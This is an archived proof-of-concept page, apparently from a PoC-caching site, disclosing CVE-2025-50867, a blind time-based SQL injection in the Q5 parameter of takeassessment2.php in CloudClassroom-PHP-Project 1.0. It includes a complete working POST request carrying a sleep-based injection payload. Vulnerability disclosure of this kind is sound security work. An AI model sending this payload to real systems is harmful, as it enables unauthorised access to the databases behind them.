Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2025-50867 PoC — CloudClassroom-PHP-Project 安全漏洞

Source
Associated Vulnerability
Title:CloudClassroom-PHP-Project 安全漏洞 (CVE-2025-50867)
Description:CloudClassroom-PHP-Project是Vishal Mathur个人开发者的一个云课堂网站。 CloudClassroom-PHP-Project 1.0版本存在安全漏洞,该漏洞源于SQL注入,可能导致数据库操作。
Description
SQL Injection
Readme
A SQL Injection vulnerability exists in the takeassessment2.php
endpoint of the CloudClassroom-PHP-Project 1.0, where the Q5 POST
parameter is directly embedded in SQL statements without sanitization.

------------------------------------------

Vulnerability Type : 

SQL Injection

------------------------------------------

Vendor of Product : 

https://github.com/mathurvishal/CloudClassroom-PHP-Project

------------------------------------------

Affected Product Code Base : 

https://github.com/mathurvishal/CloudClassroom-PHP-Project 1.0 - https://github.com/mathurvishal/CloudClassroom-PHP-Project 1.0

------------------------------------------

Affected Component : 

takeassessment2.php, Q5 POST parameter, SQL query logic

------------------------------------------

Attack Type : 
Remote
------------------------------------------

Attack Vectors : 

To exploit this vulnerability, an attacker submits a malicious POST request to /CloudClassroom-PHP-Project-master/takeassessment2.php with a payload in the Q5 parameter that causes a time delay in SQL processing (blind time-based SQLi).

POST Request:

POST /CloudClassroom-PHP-Project-master/takeassessment2.php?exid=4 HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded

Q1=555&Q2=555&Q3=555&Q4=555&Q5=5550'XOR(555*if(now()=sysdate(),sleep(6),0))XOR'Z&done=
This causes a 6-second delay in the response, confirming the vulnerability.

------------------------------------------

Reference : 

https://owasp.org/www-community/attacks/SQL_Injection

------------------------------------------

Discoverer : 
saurabh solanki

Linkedin : https://www.linkedin.com/in/saurabh-b294b21aa/
File Snapshot

[4.0K] /data/pocs/fc6efe3010a77207400b24c2ebc63c2ff2e3307a ├── [1.6K] README.md └── [1.6K] SQL Injection 0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.